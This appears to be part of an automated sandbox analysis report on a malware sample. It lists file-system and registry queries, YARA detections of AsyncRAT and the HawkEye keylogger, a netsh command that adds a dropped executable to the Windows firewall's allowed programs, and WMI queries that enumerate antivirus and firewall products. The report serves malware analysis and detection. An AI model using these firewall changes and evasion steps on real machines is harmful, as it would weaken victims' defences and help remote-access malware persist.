Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\pgr.exe

Code function: 2_2_049804AE GetUserNameW,

2_2_049804AE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 14_2_00406278 GetVersionExA,

14_2_00406278

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.599252774.00000000006E2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmp87E4.tmp.exe PID: 5036, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, type: DROPPED
Source: Yara match	File source: 12.0.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.tmp87E4.tmp.exe.6e0000.0.unpack, type: UNPACKEDPE

Modifies the windows firewall

Show sources

Source: C:\Users\user\AppData\Roaming\servieda.exe

Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: C:\Users\user\AppData\Roaming\servieda.exe

Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE

Source: tmp87E4.tmp.exe, 0000000C.00000003.516960849.000000000506E000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.601888472.0000000001070000.00000004.00000020.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
Source: Yara match	File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
